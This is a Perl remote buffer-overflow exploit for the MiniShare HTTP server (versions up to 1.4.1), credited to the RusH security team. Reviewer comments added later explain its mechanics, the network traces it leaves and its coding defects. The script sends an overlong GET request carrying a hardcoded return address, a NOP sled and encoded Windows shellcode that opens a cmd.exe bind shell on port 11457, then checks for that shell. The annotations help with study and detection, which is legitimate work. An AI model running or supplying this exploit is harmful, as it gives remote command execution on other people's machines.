#!/usr/bin/perl
use IO::Socket;
## __________ ___ ___
## \______ \__ __ ______/ | \
## | _/ | \/ ___/ _ \
## | | \ | /\___ \\ /
## |____|_ /____//____ >\___|_ /
## \/ \/ \/
## MiniShare (http://minishare.sourceforge.net) version <=1.4.1 bof exploit
## tested on MiniShare version 1.4.1 and version 1.4.0
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## this so simply and really not interesting for me but i need code this
## stuff for little work... i dont wanna insert many retrs for win-boxes
## if this xpl dont work on yours target - it's yours problems
## i dont wanna support kiddas... beeeee...
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##
## NOTE(review): What the script does, as written: it builds one HTTP GET
## whose request-target is 1787 bytes of "A" filler, the 4-byte $ret value
## (the author's return address for a single Windows build), a 30-byte 0x90
## sled and the byte string in $shellcode, sends it to the MiniShare HTTP
## port, and then declares success if a TCP connection to port 11457 is
## accepted. Affected product/versions are only those named in the header
## above (MiniShare <= 1.4.1); nothing else is verified by this code.
## NOTE(review): Defensive observables are all visible in this file: a GET
## request line of roughly 2.2 KB, most of it the literal byte "A", sent to
## the MiniShare port, followed (per the author's shellcode comment) by a
## new listener on TCP/11457 on the server and an inbound connection to it.
## NOTE(review): Script-level defects, left unchanged here: no `use strict`
## / `use warnings`, every variable is a package global, and the `Photo`
## typo near the end (see the per-line notes).
##
## Two positional arguments are required (host, port); with fewer the usage
## text is printed and the script exits.
if (@ARGV < 2) { &usage; exit(); }   ## NOTE(review): `&usage;` passes the caller's @_ through; `usage()` is the idiomatic call
$server = $ARGV[0];
$port = $ARGV[1] || 80;   ## NOTE(review): the `|| 80` default is unreachable -- the check above exits unless both arguments were given
## Windows port-bind shellcode , spawn cmd.exe on port 11457 , xored with 0x99
## NOTE(review): opaque byte string; the only facts stated about it are the
## author's (bind shell on 11457, XOR-0x99 encoded). Nothing in this script
## decodes or validates it.
$shellcode =
"\xEB\x0F\x5B\x80\x33\x99\x43\x81\x3B\x72\x35\x37\x2E\x75\xF4\x74\x05\xE8\xEC\xFF\xFF\xFF".
"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xE9\x91\xCF\xF1\x17\xD7\x97\x75".
"\xF1\x76\x57\x79\xF9\xF1\x34\x40\x9C\x57\xF1\xEB\x67\x2A\x8F\xF1\x8E\x56\x1E\x49\xF1\x7E".
"\xE0\x5F\xE0\xF1\x7C\xD0\x1F\xD0\xF1\x3D\x34\xB7\x70\xF1\x3D\x83\xE9\x5E\xF1\x40\x90\x6C".
"\x34\xF1\x52\x74\x65\xA2\xCC\x10\x7C\xF3\x92\xC0\x19\x60\x9E\xED\xA9\x19\x60\x9F\xED\x8D".
"\x66\xEC\xA9\x66\xED\x14\x99\x71\x42\x99\x99\x99\x10\xDD\x14\x99\x7B\x7D\x72\xB7\xC8\xF1".
"\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC\xB5\x10\xDC\xA9\xC0\xC0\xC0\x72\x4C\xC8".
"\xF1\xEB\xED\x99\x99\xF1\xF4\xEA\xEF\xFA\xCD\x66\xCC\xB5\x10\xDC\xA9\xC0\xC0\xC0\x72\x27".
"\xA8\x66\xFF\x18\x75\x09\x98\xCD\xF1\x98\x98\x99\x99\x66\xCC\x9D\xCE\xCE\xCE\xCE\xDE\xCE".
"\xDE\xCE\x66\xCC\x91\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\xB5\x58\x10\x7F\xF3\x89\xCF\xCA".
"\x66\xCC\x95\xCE\xCA\x66\xCC\x89\xCE\xCF\xCA\x66\xCC\x8D\x10\xDC\xA9\xCC\xCE\x72\x9C\x66".
"\xCC\x85\x72\x77\x71\x6F\x66\x66\x66\x12\xED\xBD\x9D\x12\xC7\xA9\xF1\xFA\xF4\xFD\x99\x10".
"\x7B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3\x8C\xC0\x6A\x32\x5F\xDD\xBD\x89\xDD\x67".
"\xDD\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD\xBD\x89\xCD\xC9\xA8".
"\x66\xCE\xCE\xCE\xDE\xCE\xD6\xCE\xCE\xCB\xCE\x66\xCF\xB9\x10\x78\xF1\x66\x66\x66\x66\x66".
"\xA8\x66\xCF\xBD\xCE\x66\xCF\x81\x66\xCF\xB1\xC8\xCF\x12\xED\xBD\x89\x12\xDF\xA5\x12\xCD".
"\x9F\xE1\x98\x6B\x12\xD3\x81\x12\xC3\xB9\x98\x6A\x7A\xA1\xD0\x12\xAD\x12\x9A\xED\xBD\x89".
"\xA8\x66\xA8\x59\x65\x35\x1D\x59\xED\x9E\x58\x56\x94\x98\x5E\x72\x6D\xA2\xE5\xBD\x95\xEC".
"\x46\x12\xC3\xBD\x9A\xC5\xBD\x89\xFF\x12\x95\xD2\x12\xC3\x85\x9A\xC5\xBD\x89\x12\x9D\x12".
"\x9A\xDD\xBD\x89\xC7\xC0\x5B\x91\x99\x72\x35\x37\x2E";
## 30 x 0x90 (x86 NOP) sled placed between the return value and the shellcode.
$nop_zone = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90".
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
## Filler up to the overwritten slot; 1787 is the author's offset for the
## versions named in the header.
$a = "A"x1787;
$ret = 0x77593A43; ## winXP sp0 RU with patches shell32.dll jmp esp
## i hope you can found other retrs if you need
## NOTE(review): pack('l') is a native-endian signed 32-bit integer, so the
## byte order written here depends on the host running this script (the
## author evidently assumes a little-endian host).
$pack_ret = pack('l', ($ret));
## Assemble the request-target: filler | return value | NOP sled | shellcode.
$a .= $pack_ret;
$a .= $nop_zone;
$a .= $shellcode;
print "[~] connecting to host $server port $port\n";
## NOTE(review): `"$server"` is a needless stringification; `$server` alone
## is equivalent here.
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => $port) || die "[-] Connect failed\n";
print "[+] connected\n";
print "[~] sending shellcode\n";
## The whole payload travels in the request-line's request-target; the
## remaining headers are ordinary. No response is read back.
print $socket "GET $a HTTP/1.1\r\n";
print $socket "Host: $server\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\r\n";
print "[+] shellcode sent\n";
sleep 2;   ## unconditional pause before closing; nothing is awaited from the server
close($socket);
print "[+] socket closed\n";
print "[~] checking shell...\n";
## check
## NOTE(review): "success" below means only that a TCP connect to 11457 was
## accepted; no data is exchanged on that connection before it is closed.
print "[~] trying connect to port 11457\n";
## NOTE(review): `Photo` is a typo for `Proto`, and `tcp` is a bareword
## (would not compile under `use strict`). IO::Socket::INET presumably
## ignores the unknown key and uses its default protocol -- unverified here.
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => "11457", Photo => tcp) || die "[-] damn ... connect to spawn shell failed\n";
close($socket);
print "[!] shell spawned on port 11457 ... 
you are lucky =)\n";

## Print the usage banner. Called (with no meaningful arguments) when fewer
## than two command-line arguments are supplied.
## NOTE(review): in this copy the banner text appears to have lost its line
## breaks and the host-argument placeholder; per the code above the host is
## read from $ARGV[0] and the port from $ARGV[1]. The literal is left as-is.
sub usage{
print qq{ ---------------------------------------- MiniShare ver <=1.4.1 remote b0f exploit by RusH security team // www.rst.void.ru ---------------------------------------- usage: r57minishare.pl [port] ---------------------------------------- * offset for winXP RU sp0 * shell32.dll jmp esp ---------------------------------------- };
}